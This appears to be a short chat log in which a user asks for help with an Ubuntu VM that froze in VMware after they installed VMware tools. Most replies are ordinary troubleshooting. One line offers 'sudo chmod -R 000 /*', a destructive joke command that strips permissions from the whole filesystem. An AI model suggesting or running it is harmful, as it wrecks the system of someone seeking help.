So you have a list of "folders" that are all the VMs you have setup. I can't select the Ubuntu one, like I can't even open the right click menu on it to edit it.

a list of folders where? in VMware, or as in actual filesystem folders?

I wanted to try out Linux so I went and made a VMware version of it, after installing the VMware tools package I powered off the system for a quick restart, and after that it just totally froze. I can't even open/edit it's folder inside of VMware now. any ideas?

Kill all vmware processes in the background, restart it.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

VMware is a brand, not a product. What are you running workstation? ESXi?
